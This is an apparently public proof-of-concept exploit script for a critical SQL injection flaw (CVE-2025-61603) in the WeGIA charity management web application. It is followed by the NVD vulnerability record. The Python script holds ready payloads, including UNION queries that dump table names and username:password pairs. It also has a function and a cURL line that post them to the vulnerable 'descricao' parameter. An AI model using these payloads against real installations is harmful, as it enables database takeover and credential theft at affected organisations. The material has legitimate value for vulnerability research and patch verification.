CVE-2025-61603

# CVE-2025-61603 - WeGIA SQL Injection PoC # Vulnerability: SQL Injection in /controle/control.php via 'descricao' parameter # Affected versions: WeGIA <= 3.4.12 # Fixed in: WeGIA 3.5.0 import requests TARGET_URL = "http://target-wegia-host/controle/control.php" # Payload 1: Basic SQL Injection detection (error-based) payload_error = "' OR 1=1-- -" # Payload 2: UNION-based injection to extract database version payload_union = "' UNION SELECT 1,version(),3,4-- -" # Payload 3: UNION-based injection to extract table names from information_schema payload_tables = "' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -" # Payload 4: Extract user credentials (example) payload_creds = "' UNION SELECT 1,GROUP_CONCAT(username,0x3a,password),3,4 FROM users-- -" # Payload 5: Boolean-based blind SQL injection payload_blind = "' AND 1=1-- -" # True condition payload_blind_false = "' AND 1=2-- -" # False condition # Payload 6: Time-based blind SQL injection payload_time = "' AND SLEEP(5)-- -" def exploit_sql_injection(url, parameter_payload): """ Send malicious SQL injection payload via descricao parameter """ data = { "descricao": parameter_payload, # Add other required parameters based on the endpoint } try: response = requests.post(url, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {e}" # Example usage: # result = exploit_sql_injection(TARGET_URL, payload_union) # print(result) # cURL equivalent: # curl -X POST "http://target/controle/control.php" \ # -d "descricao=' UNION SELECT 1,version(),3,4-- -" print("CVE-2025-61603 PoC loaded. Configure TARGET_URL and run exploit_sql_injection().")

{"cve": {"id": "CVE-2025-61603", "sourceIdentifier": "[email protected]", "published": "2025-10-02T20:15:35.647", "lastModified": "2025-10-07T15:43:15.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a Web manager for charitable institutions. Versions 3.4.12 and below include an SQL Injection vulnerability which was identified in the /controle/control.php endpoint, specifically in the descricao parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database. This issue is fixed in version 3.5.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.0", "matchCriteriaId": "786F635A-7423-4F96-B646-A37E357DCA1A"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/commit/84958eed73741a544859eea297908db3b83b3833", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}